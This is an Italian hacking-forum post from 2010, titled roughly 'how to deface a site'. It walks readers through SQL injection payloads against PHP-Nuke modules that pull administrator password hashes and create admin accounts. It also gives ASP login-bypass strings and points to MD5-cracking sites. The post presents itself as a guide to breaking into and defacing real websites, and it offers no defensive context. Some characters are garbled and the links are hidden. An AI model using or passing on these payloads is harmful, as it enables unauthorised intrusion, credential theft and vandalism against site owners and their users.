Total Hack Cheat
Benvenuto/a su Total hack Cheat....
non aspettate altro tempo Registratevi!!

Defaciare un Sito

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso

Defaciare un Sito

Messaggio Da RaYoZ il Mar Set 07, 2010 3:39 pm

Salve, oggi posto una guida su come defacciare i seguenti portali:
PHP Site
PHP-Nuke Site
ASP Site
PHPBB
PHPBB2 Forum
JPortal
GuestBook
Invision PowerBoard
Powered by FrontPage
_____________________|

________________________________________|
PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;

Exploit ? Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%?) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit ? Top10

Questo modulo non ? presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un p? di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l?exploit: [Devi essere iscritto e connesso per vedere questo link]
%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit ? Sql Injection

Scriviamo nella barra degli indirizzi la stringa: [Devi essere iscritto e connesso per vedere questo link]
Avremo come risultato una scritta che dice ?Selection from the databse failed!? Se avremo esattamente questo risultato siamo dentro.

Con la stringa [Devi essere iscritto e connesso per vedere questo link] si pu? creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass

ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ? union select Password,1,1,1 from members where UserID = ?admin??
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin? ?
Password: [nessuna pass]

Primo utente nella lista

UserName: ? or 0=0 ?sp_password
Password: [nessuna pass]
_________________________________|
____|Qualke sito per decriptare psw in md5|_____
[Devi essere iscritto e connesso per vedere questo link]
[Devi essere iscritto e connesso per vedere questo link]

Fonte : Web

RaYoZ
Admin
Admin

Messaggi : 1040
Punti : 2245
Data d'iscrizione : 03.04.10
Età : 22
Località : immerso nei pensieri

Tornare in alto Andare in basso

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto

- Argomenti simili

 
Permesso di questo forum:
Non puoi rispondere agli argomenti in questo forum